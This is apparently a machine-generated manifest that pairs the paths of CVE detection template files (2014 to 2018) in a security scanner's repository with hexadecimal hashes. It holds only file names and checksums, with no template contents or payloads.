+http/cves/2014/CVE-2014-2908.yaml:0cfa40770fce42f4ca72b2694a15b9333351a25b +http/cves/2014/CVE-2014-2962.yaml:eddf0d1e58d9c516218a9080ff2997f118a8edb6 +http/cves/2014/CVE-2014-3120.yaml:e3e317e434e9760e88b47cb3e371d0aaa98bed95 +http/cves/2014/CVE-2014-3206.yaml:7e179e257693c68b31e6f43ffeb92cd7b02a15a1 +http/cves/2014/CVE-2014-3704.yaml:f57b54c11bb93805f7a0c9ff03dd5989a39f72dd +http/cves/2014/CVE-2014-3744.yaml:1571547bf62afde244f15d92814985807634cec9 +http/cves/2014/CVE-2014-4210.yaml:995e67ca0c4a8aab5b6bf48979a8497b8dcb625e +http/cves/2014/CVE-2014-4513.yaml:fb4f6f23317e275044d907f50ec5c0ef43646868 +http/cves/2014/CVE-2014-4535.yaml:d1ff0bddbaf52c5e09f7f8b8ce8840815049ef47 +http/cves/2014/CVE-2014-4536.yaml:1e1ed4d3362febbc58bd36c00611ec8fe08e8558 +http/cves/2014/CVE-2014-4539.yaml:f4636a00380796eb5602d222bcc047ba6fa8d5ba +http/cves/2014/CVE-2014-4544.yaml:edd51021fd00305db7c4589bcf9bdcef8b11df92 +http/cves/2014/CVE-2014-4550.yaml:d9b06d9d3dd032b606b3e17b7cad3c3b289069f5 +http/cves/2014/CVE-2014-4558.yaml:93a6a79891b505b6d390085aecd9fdd69755c47e +http/cves/2014/CVE-2014-4561.yaml:a546ff6070d061d643405bc7b7e5aa47ac664bfe +http/cves/2014/CVE-2014-4592.yaml:a1ad9b751e5076cc1e1e2cf30a2514adb678d861 +http/cves/2014/CVE-2014-4940.yaml:84d5b56311a1281e654937b7452f8dbbc2501a3d +http/cves/2014/CVE-2014-4942.yaml:014cc07125d531540b0bac58f841e2403aead8f3 +http/cves/2014/CVE-2014-5111.yaml:d8c1931bfd9df03d9a1c7203e7ca9f4b04c2ad19 +http/cves/2014/CVE-2014-5258.yaml:21662309597241ba5c4b41e87f3b711e2474121d +http/cves/2014/CVE-2014-5368.yaml:4f51116399ba2f74d6eb783caa7896b5631262a9 +http/cves/2014/CVE-2014-6271.yaml:fc5aae00faa66caff8b44c28fbffebe7ee8a2ba2 +http/cves/2014/CVE-2014-6287.yaml:8b1f0eb12fa2f8ea3da042d90ab1cdc5b50cb9f2 +http/cves/2014/CVE-2014-6308.yaml:ca25737b0c3a6e2515c5643c33e7203e127aa9a1 +http/cves/2014/CVE-2014-8676.yaml:7fb864e66aa0a24a0f045c1d117f0e8499800aa7 +http/cves/2014/CVE-2014-8682.yaml:f2d4cd87164f7d408f6b6a9afe6497a9d340134b +http/cves/2014/CVE-2014-8799.yaml:acc7f6229d89b9982c8754476a020d33549cfea1 +http/cves/2014/CVE-2014-9094.yaml:6aceccb27fe60db3986c894ec0fe8b1824d292f8 +http/cves/2014/CVE-2014-9119.yaml:2e5e24517d7dfd7dc02495fd15f4388c422ae506 +http/cves/2014/CVE-2014-9444.yaml:f29d331bcbb3aee82c455266195817b3a344dbd3 +http/cves/2014/CVE-2014-9606.yaml:9936288573d40a7d7b49300eb8f64d5bcd0edc03 +http/cves/2014/CVE-2014-9607.yaml:1795a0604846e459806d49f84c0ed59080d7805c +http/cves/2014/CVE-2014-9608.yaml:9f9fce588be85cc4619ef8d6849ca9e8a5b1340d +http/cves/2014/CVE-2014-9609.yaml:affa806ba16250175922cfe857d0ef6808f29e79 +http/cves/2014/CVE-2014-9614.yaml:834327a99cd46ef1dff2c10190312b5ed206b2fe +http/cves/2014/CVE-2014-9615.yaml:a4ba34655d8493813f5780f04213604dfede0e96 +http/cves/2014/CVE-2014-9617.yaml:5ea035a9f175bb36632b50b4312535c132e8228d +http/cves/2014/CVE-2014-9618.yaml:c83916842bd9d38adae5251c02b728d6e842708a +http/cves/2015/CVE-2015-0554.yaml:659b8795e28b749908f3a1eb34b543f8a3edaff6 +http/cves/2015/CVE-2015-1000005.yaml:ffc2af96140130b0aec9b53890037182378f4367 +http/cves/2015/CVE-2015-1000010.yaml:de821ae61f6cc244137f5e87a55965a916480d14 +http/cves/2015/CVE-2015-1000012.yaml:52b8271cc5a3870788f0fb700b6daea959f6e8b1 +http/cves/2015/CVE-2015-1427.yaml:c2de84ced040049f0e690a12056335ddef0e778c +http/cves/2015/CVE-2015-1503.yaml:f7784033cf70bf0ecf1b72bbbbf6d15a1c343572 +http/cves/2015/CVE-2015-1579.yaml:986b567ed2e82e8d3582beb17ab07746df6bd12c +http/cves/2015/CVE-2015-1880.yaml:e2255fd7dac1ca4d1c5a3cb05a138253e701508d +http/cves/2015/CVE-2015-2067.yaml:9387e43853c0407a37224672161625ede0abeb15 +http/cves/2015/CVE-2015-2068.yaml:20623956ea88ba6ec07c1f652e0b47e7d001869f +http/cves/2015/CVE-2015-2080.yaml:5106279862d2a2c86b6e337150c6702f4123d8dc +http/cves/2015/CVE-2015-2166.yaml:f9b9be76e4fe9d68dcd47dea6ffef76f6aafb07a +http/cves/2015/CVE-2015-2196.yaml:30361be1b71f918a23245e1decefbf30f0a24e21 +http/cves/2015/CVE-2015-2755.yaml:104bef09d7344c46533b25559edb7aebea3412ac +http/cves/2015/CVE-2015-2807.yaml:d59bf5c4be8868bb035d62e883286b3e97614e25 +http/cves/2015/CVE-2015-2863.yaml:0da8e647b3367dc40530cc24f33ce1a4c0edf4c5 +http/cves/2015/CVE-2015-2996.yaml:20796e48cb4c18f4e0c43c2a9f83cdd1f8fcb965 +http/cves/2015/CVE-2015-3035.yaml:c5cf91dab43b80c697966279f6f248d1d0b3689f +http/cves/2015/CVE-2015-3224.yaml:4b5a1d3a5a98a3b4c3d2aa60163e8f4e06d21cda +http/cves/2015/CVE-2015-3337.yaml:9cbc66577d79b7f2b36b72280202277ac7dac6fa +http/cves/2015/CVE-2015-3648.yaml:6f3fa249d43891fda4a842c14dc12a55d48bb803 +http/cves/2015/CVE-2015-3897.yaml:baf0e1b72640279258dcc4f3d47cec79da72d0a7 +http/cves/2015/CVE-2015-4050.yaml:7f4639df42a6856a582467929753ee596b7b055b +http/cves/2015/CVE-2015-4062.yaml:1d36f2aecb934a51916422119bcf1751a12ed0a5 +http/cves/2015/CVE-2015-4063.yaml:510a36429dc3e9c078eeeaaf3f98da46e2818ba0 +http/cves/2015/CVE-2015-4074.yaml:4a8f894aa3edef755f4b8567b4cb4a2e26bfdf16 +http/cves/2015/CVE-2015-4127.yaml:5d03685a9f2f860eadb27ef8c23258fe9ee1e0e6 +http/cves/2015/CVE-2015-4414.yaml:b3a0d0737c3f7f2ea3a8e0e8423b69775facbd7d +http/cves/2015/CVE-2015-4632.yaml:cb3fc016a47b9ee7096f149005a8dbd0ce4c4a98 +http/cves/2015/CVE-2015-4666.yaml:c5c0c0dfa8cd3a232c7c9d36e12a073b7da79f19 +http/cves/2015/CVE-2015-4668.yaml:3712be03f4080a7af9fa446ca06d8855a4f647be +http/cves/2015/CVE-2015-4694.yaml:35fa370d65df76b507ba7a9b0d89b63930fecfcc +http/cves/2015/CVE-2015-5354.yaml:9aeaf0340b79ab02734b41923081b00744e2b0af +http/cves/2015/CVE-2015-5461.yaml:7713e74c07ce04d0d8d884aa3bce7b88d30328be +http/cves/2015/CVE-2015-5469.yaml:76cbfd0c01d4092256a403830ca1adba48c74ae6 +http/cves/2015/CVE-2015-5471.yaml:dd528889cb36a9a32abdb9d2e578797a6675da9d +http/cves/2015/CVE-2015-5531.yaml:d6a501da1575dfebd2f2cb797575da8e8b4016ad +http/cves/2015/CVE-2015-5688.yaml:3aef3c78b912e6051158122affb1760e09ed2cc6 +http/cves/2015/CVE-2015-6477.yaml:807d5af6021f46f494cba110b8543a127086d293 +http/cves/2015/CVE-2015-6544.yaml:1e585de527797b7fc5cbe5cc38f7bee20ad365ae +http/cves/2015/CVE-2015-6920.yaml:d208afce0c278ec2229cd9f190b5c3136ae2c17c +http/cves/2015/CVE-2015-7245.yaml:2882dd7e5d4e2496285d375089b1e2b57d7fc5f4 +http/cves/2015/CVE-2015-7297.yaml:1331435559192764d2bae9c94de0308d093bea4e +http/cves/2015/CVE-2015-7377.yaml:4d5ed2d5fc981ffaa2f5af3e69ee7e001535ef45 +http/cves/2015/CVE-2015-7450.yaml:1ef5022ab4a627f5187450d0b8970d287b7f0794 +http/cves/2015/CVE-2015-7780.yaml:bd44bd1c76ad360974602258a7bc585b94bbcb07 +http/cves/2015/CVE-2015-7823.yaml:93e703435e71b430c9ae009f3dd69e8d52094467 +http/cves/2015/CVE-2015-8349.yaml:431dd59f8b86dae1e2b8d81aa61730f2fcd057c6 +http/cves/2015/CVE-2015-8399.yaml:b699db7561630381c673c3facd0323b8c5f28f14 +http/cves/2015/CVE-2015-8813.yaml:3b732f2f5790844b1459aff72a3504239ccbebd1 +http/cves/2015/CVE-2015-9312.yaml:90d1cc406c978cac6b5b97916f7d9b39344e0821 +http/cves/2015/CVE-2015-9323.yaml:1bc425df35c099242bf12e16fb08e01df08280db +http/cves/2015/CVE-2015-9414.yaml:8f30ad273ca8f674714fd5245a86efa8888fa2a8 +http/cves/2015/CVE-2015-9480.yaml:3ba5c4fa1bf7970e3172d7d11e5bef13877d08b7 +http/cves/2016/CVE-2016-0957.yaml:0a3e7a1b12da7a2138e9c0aab23e8599cea00b48 +http/cves/2016/CVE-2016-1000126.yaml:f8f3258cca30a1145539c0675f491ec4d693fc6e +http/cves/2016/CVE-2016-1000127.yaml:a4c31c4356b236ae5cd41666ffc4c19a0b05ff86 +http/cves/2016/CVE-2016-1000128.yaml:4c2b957f4e721de75c5a0aeedec18fb0eac0aa7e +http/cves/2016/CVE-2016-1000129.yaml:46f2a9a6bd9ba2e87e84d81b1beba0a41eeab7af +http/cves/2016/CVE-2016-1000130.yaml:2675f9707dd1f085ae28a216b717f91c7436cb4e +http/cves/2016/CVE-2016-1000131.yaml:540ba18909055d6b93917034588da522cba8c885 +http/cves/2016/CVE-2016-1000132.yaml:37774d53e99885a2b144c680af7784a18fc5171f +http/cves/2016/CVE-2016-1000133.yaml:8d02017b505559a6f1f28656d2cbb02809127070 +http/cves/2016/CVE-2016-1000134.yaml:70cc44c6c247f91f1dc103ade6f589b7471e9817 +http/cves/2016/CVE-2016-1000135.yaml:9e17889d836c035e2e45bd52feadd1ee578398fe +http/cves/2016/CVE-2016-1000136.yaml:730cc1a56abc6f00084a6361ca9bb4814f8835c6 +http/cves/2016/CVE-2016-1000137.yaml:a7b0cf0e4ecca1da40410d9e403c2526637126f5 +http/cves/2016/CVE-2016-1000138.yaml:e7a31c9a275585c437b618611b7612edd4f3807a +http/cves/2016/CVE-2016-1000139.yaml:3ee5f04546ad0344cb6f086ce2de413159d0fddf +http/cves/2016/CVE-2016-1000140.yaml:fd74168255cbdfd3d631aeaca53683dfd04bc405 +http/cves/2016/CVE-2016-1000141.yaml:8c95e595968b7278cfd26715ef357cbdf76f1e48 +http/cves/2016/CVE-2016-1000142.yaml:4a1a61abc724720fd19d914e262c5ac59dcf5027 +http/cves/2016/CVE-2016-1000143.yaml:87fec37195a681f5ec2d064812615e7bf2db2028 +http/cves/2016/CVE-2016-1000146.yaml:048859db2ec4909ebd33b91331ee0c1fc8c6a488 +http/cves/2016/CVE-2016-1000148.yaml:e31ea7d94eb7dd5dcd70673e6cf08c072699521b +http/cves/2016/CVE-2016-1000149.yaml:90f9413bc73a5bb4ba313d24020f92962333ab4e +http/cves/2016/CVE-2016-1000152.yaml:94d66856fa53ae44dd41816ba93b7972e6fe8bec +http/cves/2016/CVE-2016-1000153.yaml:6081c27635ef1d9d159cd5a846f52f40d5c105c5 +http/cves/2016/CVE-2016-1000154.yaml:721687899bde0423dbfc2eddb3460a000a85cfa1 +http/cves/2016/CVE-2016-1000155.yaml:97ff481e4e164bdb795664571acf5ce7d90f3cbc +http/cves/2016/CVE-2016-10033.yaml:0c3dedc51f45fd98edfaa2b817911c905f13ebec +http/cves/2016/CVE-2016-10108.yaml:de9616235488dd493b73a6a05022121ad6546f44 +http/cves/2016/CVE-2016-10134.yaml:086f615910acbf3db1faa9bc80caeed509773011 +http/cves/2016/CVE-2016-10367.yaml:782395ca1e615467f6e920b5342e1750baca4a95 +http/cves/2016/CVE-2016-10368.yaml:0c0c5fb779af88bb040e982833ecd435e7ddc83d +http/cves/2016/CVE-2016-10924.yaml:1fe7f0a1eeb3a5e7f927c5b986589c9fe6ed6fbd +http/cves/2016/CVE-2016-10940.yaml:53139d6bd0dd3af37f625eb1a0645e7a26dcf4b3 +http/cves/2016/CVE-2016-10956.yaml:ca21189a0a9c8ef5db176039608bb7416799ec19 +http/cves/2016/CVE-2016-10960.yaml:a5e4be94bab72350ea4c9fa719a45e5cdcb18ae4 +http/cves/2016/CVE-2016-10973.yaml:61fe4db34038e8745c9e6b9cb2a229d8d45209ec +http/cves/2016/CVE-2016-10993.yaml:93c378cd3e217b9371ef5e5ee8d00e683296a2dc +http/cves/2016/CVE-2016-1555.yaml:68d3ca41bab3a0b466631aa4ac62d85bcfcba502 +http/cves/2016/CVE-2016-2389.yaml:226fa6b685a48a4ee3c8db6b6802da0c40f8e1fb +http/cves/2016/CVE-2016-3081.yaml:a9707b6f3a8b559c469fbbc201c3d772511847f9 +http/cves/2016/CVE-2016-3088.yaml:e7d6d8006d0db0ba9e7648aff2aa144dfc33b30a +http/cves/2016/CVE-2016-3978.yaml:a2f4ad4ad3076c7b9e2addb22010a56b9072bdc0 +http/cves/2016/CVE-2016-4437.yaml:7fbaff020c74f7c71f10eb807c13c589a2c6cbf2 +http/cves/2016/CVE-2016-4975.yaml:48cdc78d4543735753b073f84552383c54c34fce +http/cves/2016/CVE-2016-4977.yaml:fcac2af9b90a7a94efedc389e18a838b981a9aab +http/cves/2016/CVE-2016-5649.yaml:135d2c6c11dc3692f36a520fe3551e81285d7a40 +http/cves/2016/CVE-2016-6195.yaml:fba8084385f6701f785c3bee77e64bc3f93eb80a +http/cves/2016/CVE-2016-6277.yaml:efa9343224dc1ebf7564d2d9e23b7b9d92fa4347 +http/cves/2016/CVE-2016-6601.yaml:a3c7e2c21c870b07109f3664c432140f5cceec41 +http/cves/2016/CVE-2016-7552.yaml:aee4e3cc528797b0cd2a47729fff44f652419038 +http/cves/2016/CVE-2016-7834.yaml:dab53979b40c3922cdb546391c126f44418156e6 +http/cves/2016/CVE-2016-7981.yaml:ac60ca8e1ecc927a14bf4319f6083e17b6fd727e +http/cves/2016/CVE-2016-8527.yaml:773ca2efacaa8916fa7080a8bd41f0bceab2369f +http/cves/2017/CVE-2017-0929.yaml:156ffbb082c22db014fc043211d39872fd0df6dd +http/cves/2017/CVE-2017-1000028.yaml:751a2c67d0e55cb363c64cb3ae6f303de58563a6 +http/cves/2017/CVE-2017-1000029.yaml:21223d069a4954250faec117a9e4578a9f1c1863 +http/cves/2017/CVE-2017-1000163.yaml:b96ab3cadb75a62584fc55147fe007fab615df0b +http/cves/2017/CVE-2017-1000170.yaml:d7d1ec452611059a133d6781682e450631950501 +http/cves/2017/CVE-2017-1000486.yaml:7003193b090ceb4a7943d101b48542e21162ff3a +http/cves/2017/CVE-2017-10075.yaml:e9261b6c6187bedef5cff65f5f283519d3f308e3 +http/cves/2017/CVE-2017-10271.yaml:29f7b08dcd395a510b503c7e120880730a8daaaf +http/cves/2017/CVE-2017-10974.yaml:af56cfdfc430f0f28c4a5e5181db15a4cb2c57f6 +http/cves/2017/CVE-2017-11165.yaml:7d62d2128861a4fad561d03ad31950c68bd35559 +http/cves/2017/CVE-2017-11444.yaml:ad5e4c999d39198f495b5e815772abda7ab428c8 +http/cves/2017/CVE-2017-11512.yaml:0f19663f4d797b4f643898a12d4bf26678b97406 +http/cves/2017/CVE-2017-11586.yaml:88935333a8a8dde7fd72351b044139b2ff789c21 +http/cves/2017/CVE-2017-11610.yaml:359a5a24bc2ecc2bc26d0e3250aa608431c120b8 +http/cves/2017/CVE-2017-11629.yaml:b335399d0c37665fecdbdd82ef20a9bd7fd1b403 +http/cves/2017/CVE-2017-12138.yaml:d17aa58b073a9ee3e6560861259b13b479f6aba3 +http/cves/2017/CVE-2017-12149.yaml:cb719a548fc0f8a6b9dafe73258905717f178b60 +http/cves/2017/CVE-2017-12542.yaml:2e5ef39f8eb80a7943e69da2a61c83d7b6e924eb +http/cves/2017/CVE-2017-12544.yaml:50642b0229583dda780b88c6de299f929c409955 +http/cves/2017/CVE-2017-12583.yaml:6b7bfec8b1d80b5b43fdde9fea801be2df7c7483 +http/cves/2017/CVE-2017-12611.yaml:484a71cd22ea2bb0c0ba95b7cc215c66f0e26254 +http/cves/2017/CVE-2017-12615.yaml:5695ecc3e82224a7893bdedfda8b851d2101d103 +http/cves/2017/CVE-2017-12617.yaml:c07e20a087b1bd03a9e0c85bd54f855739ca1986 +http/cves/2017/CVE-2017-12629.yaml:06e39f734df98bbc65380e1afc47cf7b32758141 +http/cves/2017/CVE-2017-12635.yaml:89da151afd911eebf2816bca75a5a38868370f0d +http/cves/2017/CVE-2017-12637.yaml:e8473653f1aa39d22d1a9172815cabd916ff16b7 +http/cves/2017/CVE-2017-12794.yaml:7f00225ae91942eedb566388ae0512cb5fcb9bd9 +http/cves/2017/CVE-2017-14135.yaml:ac38d72ce326451404b20e335f16184e3176ba8a +http/cves/2017/CVE-2017-14186.yaml:6497e101b1f36767c74e08296dac721153756043 +http/cves/2017/CVE-2017-14524.yaml:d4275616ee0e6c09824b9c3e93c5b6520f1de5c3 +http/cves/2017/CVE-2017-14535.yaml:1551633c34c18e17e8e93655f4e7ad21183d6d4f +http/cves/2017/CVE-2017-14537.yaml:2e130045a29d4ba0c5c894ddcde1319916aace1c +http/cves/2017/CVE-2017-14622.yaml:c2c6a4d1aed0c576767deaea7d49bea72d0b9935 +http/cves/2017/CVE-2017-14651.yaml:a585f8d3c4a48452dc582015b40f86b182156bc6 +http/cves/2017/CVE-2017-14849.yaml:683a9b1407e6aceab67bf2e81e898d94c7cdf753 +http/cves/2017/CVE-2017-15287.yaml:38ba66c0dc639e46780a3d10987eac905769ad1c +http/cves/2017/CVE-2017-15363.yaml:b2765229192e0704e020a74ef9858bcffaadfa03 +http/cves/2017/CVE-2017-15647.yaml:44bd0c38aecc3355082a1a344c2423227a582768 +http/cves/2017/CVE-2017-15715.yaml:fa4aa9824abb110fe2003084a1ad26979a301709 +http/cves/2017/CVE-2017-15944.yaml:4f6bb0ddf4f25d144c7bc24e56a9c001b4e4474a +http/cves/2017/CVE-2017-16806.yaml:c8ea6d5277fcd6c26ef79a8d3f6f98293b7dfffe +http/cves/2017/CVE-2017-16877.yaml:d7f2268b72e55681ad690b3513887cb7fac62424 +http/cves/2017/CVE-2017-16894.yaml:edc8cbecaa723d30c435f4bb99cdf8ea6874dc20 +http/cves/2017/CVE-2017-17043.yaml:db102e4fc0cb5b46a858f05bedf47cda8bda1492 +http/cves/2017/CVE-2017-17059.yaml:13d35edfc853c40e0df1ef239aa246580ec5dc5c +http/cves/2017/CVE-2017-17451.yaml:cb46f67ccb5a9ab3a81a0d84fa0fc85a10f6d475 +http/cves/2017/CVE-2017-17562.yaml:c4181dd123c02dfae2a0e35f5b0e9afdf0a89b48 +http/cves/2017/CVE-2017-17731.yaml:54ab95a47772ca8d9748f3773cc3fba3a3e589fe +http/cves/2017/CVE-2017-17736.yaml:f47ce635bbd7b91c452444c1d6d38d0041ff4129 +http/cves/2017/CVE-2017-18024.yaml:16aacbbf869a896057a7d73c766220e05c6d63bd +http/cves/2017/CVE-2017-18536.yaml:073b2bd660b7c7e58d4375cf5cbfd679c30f3b22 +http/cves/2017/CVE-2017-18598.yaml:3066c9acf8d5fe22158b309e0b9db99ac75776e5 +http/cves/2017/CVE-2017-18638.yaml:b1f1b3a6e67cef40fc57d5c7736773da8ec6d02e +http/cves/2017/CVE-2017-3506.yaml:cb67f6703832c8884508443ad86767e5b70277df +http/cves/2017/CVE-2017-3528.yaml:fe0bf929e8bcc63eb862d2fdfc61ad7954876ec9 +http/cves/2017/CVE-2017-4011.yaml:1cfeff5e385aa6e711ce964331149bb6bfb2f933 +http/cves/2017/CVE-2017-5487.yaml:fcc7b50483ffee1bd99a011a6e46382502f3d3e9 +http/cves/2017/CVE-2017-5521.yaml:3e27047a1b938782d486b2d3c47c6a02c129481e +http/cves/2017/CVE-2017-5631.yaml:e505ae35fccfd351702cc97058e6fdd94a699e6f +http/cves/2017/CVE-2017-5638.yaml:932f049ff5959aa43ee2ac4f2ca173d15fc38572 +http/cves/2017/CVE-2017-5689.yaml:cba993cddf5712257e43f0565e9716d74f671235 +http/cves/2017/CVE-2017-5982.yaml:fe6270f61617309ef1220b05dec4afa7cd874aa6 +http/cves/2017/CVE-2017-6090.yaml:81da758bf7c65148ee4581e504f8c8a19ceccdd6 +http/cves/2017/CVE-2017-7269.yaml:b65d1d477904c5fb66c455c194b1d563f529a0db +http/cves/2017/CVE-2017-7391.yaml:3f2bae632532a9c5d7306f7308209df69a1c8d00 +http/cves/2017/CVE-2017-7615.yaml:5f5eb1c74be80f091405af7184a97b1338e688f0 +http/cves/2017/CVE-2017-7921.yaml:cf5b3a6e68fb950595e204a52c60710ca832ef8c +http/cves/2017/CVE-2017-7925.yaml:a2842c2bcf085ca1b0513fb6dec806c6dc59b178 +http/cves/2017/CVE-2017-8229.yaml:cbec39165ffe097e90331cb96e59fa8dee4b644f +http/cves/2017/CVE-2017-8917.yaml:44ffadb4f71c3d8746f8bb01a6d7f00d943b1c84 +http/cves/2017/CVE-2017-9140.yaml:342193a3aaf4aa8d422debbbb1df7ab9ad9df586 +http/cves/2017/CVE-2017-9288.yaml:43f0b6f353f7c2d1663be3ebd7a65797f68971dc +http/cves/2017/CVE-2017-9416.yaml:22dc5d6a09dd8d15c5642c02f5bca6d165a78b51 +http/cves/2017/CVE-2017-9506.yaml:6eee3d55c410c2c21bf7ab88de2f3cda4747e329 +http/cves/2017/CVE-2017-9791.yaml:592966c3145bb13bba7e94ad0fd0afe2036a7bd4 +http/cves/2017/CVE-2017-9805.yaml:f195d2dcb6900a57e6faed098cc9a13e0dd32eec +http/cves/2017/CVE-2017-9822.yaml:cbdef49353a226d033ace82b04ebe0efc51ea1ec +http/cves/2017/CVE-2017-9833.yaml:9ccc19106459b62fe12e8594f00c42c7237aca46 +http/cves/2017/CVE-2017-9841.yaml:8bf3ae0ce8f5eaae43b2aef5eb08a1aba39c0d59 +http/cves/2018/CVE-2018-0127.yaml:0ae575cd48f28508e5291951e455221eac9cafb4 +http/cves/2018/CVE-2018-0296.yaml:d62a33dd5c2ee1d3e4aa182facc703a68c0978ab +http/cves/2018/CVE-2018-1000129.yaml:9b8b8ce52cd0470a3a7f3744d5b0065d0f0f885c +http/cves/2018/CVE-2018-1000130.yaml:11fa80711135933976872c7fe189f12db2afce71 +http/cves/2018/CVE-2018-1000226.yaml:255207b20f324eb2c01080c901fc992bcb88efa1 +http/cves/2018/CVE-2018-1000533.yaml:be6679b8d9e7a64d309298cffec957737dac20fe +http/cves/2018/CVE-2018-1000600.yaml:22d0625a587034b5ffcfeac88985eb99b9a03530 +http/cves/2018/CVE-2018-1000671.yaml:b6ff1bd9a119c535837fe2e06898e97c69ad6a27 +http/cves/2018/CVE-2018-1000856.yaml:be41b32d737be3441fe6e4f7ef74b67748e4dcdf +http/cves/2018/CVE-2018-1000861.yaml:1748897c4eabdf60d9fb35d0bd1b0ebba7c75085 +http/cves/2018/CVE-2018-10093.yaml:ff359c6e60622ec059d654bec1b1adb8ae8318cc +http/cves/2018/CVE-2018-10095.yaml:6df65e78368ee4eee2bf4a88dcdaad321de6f75b +http/cves/2018/CVE-2018-10141.yaml:33a89379b3cc898af97ed8a4f874beddc168721c +http/cves/2018/CVE-2018-10201.yaml:af0a79eec3f6409e2bff4d0c85b070a94ed3a630 +http/cves/2018/CVE-2018-10230.yaml:656aa1fa9e3dfdb3f9ab6d7046914d78809a802f +http/cves/2018/CVE-2018-10562.yaml:1474d77b0aa8fcc0eab21dd213e3229dfeaf04ce +http/cves/2018/CVE-2018-10818.yaml:b6a13d19d6f17e37c9e8b4c1e5057a19bc121581 +http/cves/2018/CVE-2018-10822.yaml:c87a226505392cb9454a0b4922153d2668f3abc1 +http/cves/2018/CVE-2018-10823.yaml:15537da7420eea8ac4aca61fb41bce1d1bd2953a +http/cves/2018/CVE-2018-10956.yaml:81491ceb91be190b993f0a49a3d3ae2bb92c1463 +http/cves/2018/CVE-2018-11227.yaml:d32f92b68bd2fbed15086a638120bb3cf8bfb91d +http/cves/2018/CVE-2018-11231.yaml:2696ea6e10c2413d9bbb87e59513f555cf6727c6 +http/cves/2018/CVE-2018-11409.yaml:7b8124448723b7259d273829e836de5c85cdfe35 +http/cves/2018/CVE-2018-11473.yaml:320f1f3500c5749895c592c3158c0c4f842f8c20 +http/cves/2018/CVE-2018-11709.yaml:ea2cf62203e74a56a430c38f756580cece87123a +http/cves/2018/CVE-2018-11759.yaml:660f1332c3ed9517c62aa16056cc75bbdd7db893 +http/cves/2018/CVE-2018-11776.yaml:3a152460b9a53f51bdbe5f2bebe6f70bf931bebc +http/cves/2018/CVE-2018-11784.yaml:554f2d2d5a0b42aca7f840d9ee80016eed127bd0 +http/cves/2018/CVE-2018-12031.yaml:4c153bfd5e36357e5095aaf27c57506bb1c2f846 +http/cves/2018/CVE-2018-12054.yaml:dccbe687f67f983b7a4758d5bb5a2c7de4e9fcf2 +http/cves/2018/CVE-2018-1207.yaml:0fab3ed8e99c49a95e9bdbd92a72ae98d59a7c84 +http/cves/2018/CVE-2018-12095.yaml:b5fef38597f114bbd5f952798ecb2a9fedd16ab0 +http/cves/2018/CVE-2018-12296.yaml:ab27bc7c5232c804123eb5cb9f1623030b10043c +http/cves/2018/CVE-2018-12300.yaml:8f1df7ca596b203b61724588b72e3b49611d2e5d +http/cves/2018/CVE-2018-12613.yaml:8ad4cc041e544b269d8dcf388b98b012e25c233e +http/cves/2018/CVE-2018-12634.yaml:29b9b4f6f7062411c2921ffcd6d0189952d91cf5 +http/cves/2018/CVE-2018-12675.yaml:db0bd305f41675e6ffce1df7bd1b36c586d73f8a +http/cves/2018/CVE-2018-1271.yaml:77add89222717504753299d801a863167ddaaafd +http/cves/2018/CVE-2018-1273.yaml:b9e4d379a1491f44b876c1376c07494bece5d394 +http/cves/2018/CVE-2018-12909.yaml:8ccf8f5a5867f05e4444206a5f75d7dab5ef4c45 +http/cves/2018/CVE-2018-12998.yaml:353f0b77de36cbfb40390bae0c4a516f130b5baf +http/cves/2018/CVE-2018-1335.yaml:8ccbc73559d654c9209c424edd163292a542a9f7 +http/cves/2018/CVE-2018-13379.yaml:128d5605d1c5c84eea403a96bd78409cf451b0a1 +http/cves/2018/CVE-2018-13380.yaml:ecef2dd7ee2a6c9868f044f4c73ffac64cded1e3 +http/cves/2018/CVE-2018-13980.yaml:cbd37edd1835aec21854f3cb67ae8d2f11faa425 +http/cves/2018/CVE-2018-14013.yaml:97b6ce2ae3fb274756b61968cdca393cfe98b958 +http/cves/2018/CVE-2018-14064.yaml:d842f3d4827e72af0e8c04945b64936022aa46c0 +http/cves/2018/CVE-2018-14474.yaml:8cf72f319fcf3194d0b266600141accfe8f91021 +http/cves/2018/CVE-2018-14574.yaml:69fab5501c3a59e9fce0977be1487dc4da460f87 +http/cves/2018/CVE-2018-14728.yaml:9f518d5547fa3890c183978e7d086b6ec98e1f9d +http/cves/2018/CVE-2018-14912.yaml:ee607ae079c6a02bfc3adbe0da9fe1f56727d79e +http/cves/2018/CVE-2018-14916.yaml:a51ea758f86e85c251c8a63cdeca115993b6c3d6 +http/cves/2018/CVE-2018-14918.yaml:bf1ff809e48514f0adddb27bc08db83e40835da4 +http/cves/2018/CVE-2018-14931.yaml:21a9a283b54786bf2a7b9d3c58508e2566572edd +http/cves/2018/CVE-2018-15138.yaml:08d57dc62853e90768bc250e6f55ba98e3f1fa0e +http/cves/2018/CVE-2018-15517.yaml:0d367435a2abc667c1be8495267affb1cdf1acb2 +http/cves/2018/CVE-2018-15535.yaml:8427d459d832f50c6ef7c887b6422e5dbe18bba9 +http/cves/2018/CVE-2018-15745.yaml:6c1dfe3afaf4cf031b2047978e32e6467dce08ef +http/cves/2018/CVE-2018-15917.yaml:109ac4d3da8f02b4cab74734d949d31bf4cfab72 +http/cves/2018/CVE-2018-15961.yaml:3386eb2921d91ef7b984bdf77431641fbd0d775b +http/cves/2018/CVE-2018-16059.yaml:54203890ef10bba852ecda1bb07871b6fd29c732 +http/cves/2018/CVE-2018-16133.yaml:32b72bc8b45a5c960959d1ffdb97cb14913b588f +http/cves/2018/CVE-2018-16139.yaml:f16ebf50d34ca7128695912bf82b2b29cc4b1c1e +http/cves/2018/CVE-2018-16159.yaml:83620bd6cfb431a85b6b6a29ab503e9de6c745ee +http/cves/2018/CVE-2018-16167.yaml:cb2b708656d27c062bf8ec2017d5186c95825724 +http/cves/2018/CVE-2018-16283.yaml:ca7b371412c9432f1ffa32b640e6fe7079ae99fc +http/cves/2018/CVE-2018-16288.yaml:2e4e734ab1b00b8f8cd46dd384a4c2312313ab38 +http/cves/2018/CVE-2018-16299.yaml:4212a08dcc9566a4c1468143dc6e04c42f2cb671 +http/cves/2018/CVE-2018-16341.yaml:a05c2276169d02e77d747ae77a0ce7a104ad1a97 +http/cves/2018/CVE-2018-16668.yaml:c1be1c6b7f277304e86eab56e5dd7402c6278089 +http/cves/2018/CVE-2018-16670.yaml:ba96c6c6f0e211853f98bde66155451ffc7f812c +http/cves/2018/CVE-2018-16671.yaml:37fee8e8219ad4d5615c04cdb1cffb3b002d88a9 +http/cves/2018/CVE-2018-16716.yaml:84b0e0a734b87ecc55b368e2e52c5c95bf001f39 +http/cves/2018/CVE-2018-16761.yaml:4e3736268e5215cb5ca6c72af01dea571871d46b 